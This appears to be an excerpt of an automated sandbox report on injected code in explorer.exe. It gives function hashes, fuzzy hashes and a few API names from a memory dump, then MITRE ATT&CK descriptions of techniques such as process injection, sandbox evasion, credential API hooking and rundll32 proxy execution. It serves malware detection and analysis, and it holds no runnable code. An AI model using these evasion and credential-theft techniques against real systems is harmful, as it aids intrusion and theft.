Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
Instruction ID: 272f07987ef3607f65ce5aa1b682e4cd9859e0c46eb66d12740a93ece9b8df2c
Opcode Fuzzy Hash: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
Instruction Fuzzy Hash: 76426B767B82804B974CC918DCA36F932DAE7C631E71CA43DE9C7C6247EA29D5078948

Uniqueness

Uniqueness Score: -1.00%

Function 04DA2BC8, Relevance: 1.0, Instructions: 959COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
Instruction ID: a64948556948a8634f0c7618ab9fb3448d979137ae11a7b98afc72026e5f2838
Opcode Fuzzy Hash: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
Instruction Fuzzy Hash: 30721D34718B448FDB79EF29C894A6AB7E2FBD8305F14896ED58AC3254DB30E451CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DC8224, Relevance: .8, Instructions: 818COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
Instruction ID: e2a11657d819be315564a2e256d15ec5b849a51104c835058dfebb14202e7b9c
Opcode Fuzzy Hash: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
Instruction Fuzzy Hash: 5052E2305246458FCB6DDF18C4C5AB077E1FB49316B2412BDEC8ACB25BEA39E486CB45

Uniqueness

Uniqueness Score: -1.00%

Function 04DA7320, Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf05252a05ea58bc97de27108a202a4aef29202f1b45d0635475cb66fd9e309
Instruction ID: c9458f43cdb246698d5853dca5c6b46c980a7b53e29d66f62cbcf4ebe45ae188
Opcode Fuzzy Hash: baf05252a05ea58bc97de27108a202a4aef29202f1b45d0635475cb66fd9e309
Instruction Fuzzy Hash: 5A12D170618B999FC31DDF2884856E5B7E4FB45308F14066ED8D783A02E72AF466CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 04DCE080, Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
Instruction ID: b5baf07412190c865e7dc7f9604eea324974e8bccabb0be3fb0b4ea14412f951
Opcode Fuzzy Hash: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
Instruction Fuzzy Hash: 0B1220B0615F9BAFC70DDF28C4856A4B7A1FB59319B10462DC46AC3A41E735F466CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 04DAD460, Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
Instruction ID: 9d16d85059858841a6fefd7b0e8abec060b05de45e9fe2f4234050b6e94e5a71
Opcode Fuzzy Hash: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
Instruction Fuzzy Hash: 33F13770614A098BE72DAF2CD8842B573E3FB85319F18423ED587C3595EA34E467C682

Uniqueness

Uniqueness Score: -1.00%

Function 04DB8B4C, Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ff7cdd9ab4db3fccd5fc41fa4c9d3ca355271f65650ec7d004171c1611c6aa9
Instruction ID: cb08f17b67915dd370e91ff39ad7fe7a2a8519d6b1f25c651af741d148bdfcc6
Opcode Fuzzy Hash: 3ff7cdd9ab4db3fccd5fc41fa4c9d3ca355271f65650ec7d004171c1611c6aa9
Instruction Fuzzy Hash: 06F19770618A488FC778EF2998857AA73D5FB98310F50466DE4CFC3255EE30E84697C6

Uniqueness

Uniqueness Score: -1.00%

Function 04DCF940, Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
Instruction ID: 152f60c2a0e30ac9ba6afe41342de97e882bb6146f27aee283e6ddd14aab2089
Opcode Fuzzy Hash: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
Instruction Fuzzy Hash: 9EE1F531618A864BD71D8F3CD9962B47BD2FB95314B28426DE8DBC33C7E529E4078781

Uniqueness

Uniqueness Score: -1.00%

Function 04DBD4A8, Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
Instruction ID: 384d5200704cbb1f398dab594e2cea72f770dceef7c6c1112d1aada4d7949535
Opcode Fuzzy Hash: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
Instruction Fuzzy Hash: DED1F334258A098FE71D8E28D8C26F577D3FB46305F54426CD9CBC7252EA25E493CAC6

Uniqueness

Uniqueness Score: -1.00%

Function 04DC74CC, Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
Instruction ID: 338323bf829056cff1c52e99f3cc2fdc82dacae3bc3b6b515386a522e818075d
Opcode Fuzzy Hash: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
Instruction Fuzzy Hash: E4D1D630718B198FDB18EF29D8C5669B7E5FB98700F50452ED58AC3261EE34E946CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 04DC20F8, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: gethostbyname
String ID:
API String ID: 930432418-0
Opcode ID: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
Instruction ID: 138fe902577deecd8455877ea6c3d2e2b02daeafcc57391cf41eb3c19a541187
Opcode Fuzzy Hash: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
Instruction Fuzzy Hash: 04E15530B14B068FFB58EB79DCA4AA673D6FBDC315B44807D984AC3254DE38E9418B61

Uniqueness

Uniqueness Score: -1.00%

Function 04DA203C, Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Find$File$First$CloseNext
String ID:
API String ID: 2001080981-0
Opcode ID: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
Instruction ID: 913c3ad6fd77d83c1bb25727440020e84c0bd4c3cd19633215fe55cb06aeaa79
Opcode Fuzzy Hash: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
Instruction Fuzzy Hash: A4D1A63161CA088FEB5AFF29EC9996A73E5F798300700462ED44BD3265DF78E945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04DBB040, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
Instruction ID: 1edc3af4378462debcd5ed438d85e540e0085dcdbc419a3c17be2155b658bb85
Opcode Fuzzy Hash: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
Instruction Fuzzy Hash: 49E1403060CB48CFDB69EF14D8896EAB7E1FB99341F54852ED58AC3220DB74E545CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DC94B8, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
Instruction ID: 51362d2b2118c11f08f3429a892f7d00d3218271e734d665174add9b9d29a625
Opcode Fuzzy Hash: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
Instruction Fuzzy Hash: 91C19170218A068FEB58DF38D4997AAB7E5FF88705F50456DD48BC3690DB34E852CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04DCA4BC, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
Instruction ID: 98d7a458847d8065703c459c24f0a37a7c0559c2fd4c646f4dccc9af9680de55
Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
Instruction Fuzzy Hash: 2C917570618B098FE758EF28E8997A673E5FB94311F00852ED58BC3251EF78E8468781

Uniqueness

Uniqueness Score: -1.00%

Function 04DC91A0, Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
Instruction ID: d2a11981d33d8710e607522d96c766091798f6d54a607f6da67081ea07f378ca
Opcode Fuzzy Hash: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
Instruction Fuzzy Hash: B081097121CB098FEB54EF28DC996A977E1F799310F00496EE44AC32A1EF34E94587C6

Uniqueness

Uniqueness Score: -1.00%

Function 04DCBEB0, Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
Instruction ID: ec535fa0ba9542556b28bd514037fa0008e012d27c1fb435bf8132ca4b54d386
Opcode Fuzzy Hash: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
Instruction Fuzzy Hash: D9815D3570CB498BDB28EF58E88566AB7E2FBD4701F05462ED44EC3265DF74E8018B86

Uniqueness

Uniqueness Score: -1.00%

Function 04DB9CB0, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
Instruction ID: 0f330cddfb1a881cdb23ae29a47e693850c6db2846b2fe9b88ea2db4a4e3ae56
Opcode Fuzzy Hash: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
Instruction Fuzzy Hash: E8815370318B49CFDB54EF69D898AAA77E1FBA8301B10496DE55BC3254DF34E841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04DB452C, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
Instruction ID: 2f9f1f8da61d2cb5b008038b12f20698ee0206f42bb249587b3f4727cb27930c
Opcode Fuzzy Hash: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
Instruction Fuzzy Hash: F871C431718F098FEB54EF6C98996A6B3D5FB98314B45826DD88BC3252EE34E805C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 04DA9F98, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
Instruction ID: 918f8f4ef35c8d4e3427bcdfe33c923d2c2f94f5c6bdb09e46fbaf3f03149fbc
Opcode Fuzzy Hash: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
Instruction Fuzzy Hash: 2F717031714A088FEB68EF2CD49576533D1FB58344B0482AADC4ACB35AEA34FC52CB85

Uniqueness

Uniqueness Score: -1.00%

Function 04DAAE04, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
Instruction ID: f6c4364d05e9da52afaddd4af5d70a6261accb45e942f7307a603e5edda7df9b
Opcode Fuzzy Hash: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
Instruction Fuzzy Hash: 8E719230719B088FE754EF5DD84966AB7E5FB98711F10862EE54AC3210DB74E842CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DB17B8, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
Instruction ID: 47aed25d43f52fd5afe8675ef615ec2f136a66f41c049e5a8f68b37a2a79350b
Opcode Fuzzy Hash: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
Instruction Fuzzy Hash: 9761F135B1CA489BDB28AF2898652BE73D5FB95350F15452DE8DBC3245EE20FC4287C2

Uniqueness

Uniqueness Score: -1.00%

Function 04DC6064, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
Instruction ID: 6829748b9d005c45c5581f1668ae77d3801a6e0e0842bb43934576986ae74f29
Opcode Fuzzy Hash: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
Instruction Fuzzy Hash: A6715F30718A06CFEB64EF68D884BAAB7E5FB98311F40852ED44AC7255DF34E941CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04DB1174, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
Instruction ID: 0486b653208b434861d41251786e9def636a5d581443df36b515f56ee9f1c749
Opcode Fuzzy Hash: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
Instruction Fuzzy Hash: F7619A31708A488FDF64EF689C9856D77E2FBA9301B55452DE48BC3260DF34D846C781

Uniqueness

Uniqueness Score: -1.00%

Function 04DB1D94, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
Instruction ID: e54e8891c1e62e7d79be55e15dbc86686ae19d378154aef3dcc54baf7255e0f3
Opcode Fuzzy Hash: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
Instruction Fuzzy Hash: 10517531718E098FAB68EB2D9C9967973D6E7EC711714812ED44BC3265DE38E8078781

Uniqueness

Uniqueness Score: -1.00%

Function 04DC26B4, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
Instruction ID: b46581695ec749ff8ef0e226d9e98113348647a47227e7c1e0ac055673206bfa
Opcode Fuzzy Hash: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
Instruction Fuzzy Hash: BF3140347547068BEB44EF38D89866677E2FBD8341B04C93DD945C3264DE75E8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DABCF8, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
Instruction ID: 95f022efb65d7fd685dea1093f42dbb4af5ecc96274613cef35aa95510b465b7
Opcode Fuzzy Hash: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
Instruction Fuzzy Hash: 56413B1511DBC2AEC31ADA2D84401A9FFA1BFB6100B48879DD4C997F43C358E669C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 04DC3208, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
Instruction ID: ad6fc78e531d9db944f603454d827865fb7db568d68ceaea2e305341b69f5fcb
Opcode Fuzzy Hash: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
Instruction Fuzzy Hash: 61318E1111DBC7AED30ADA6D8040169FFA1FB77200B48879DD4D597B43C318E6A9C7E2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

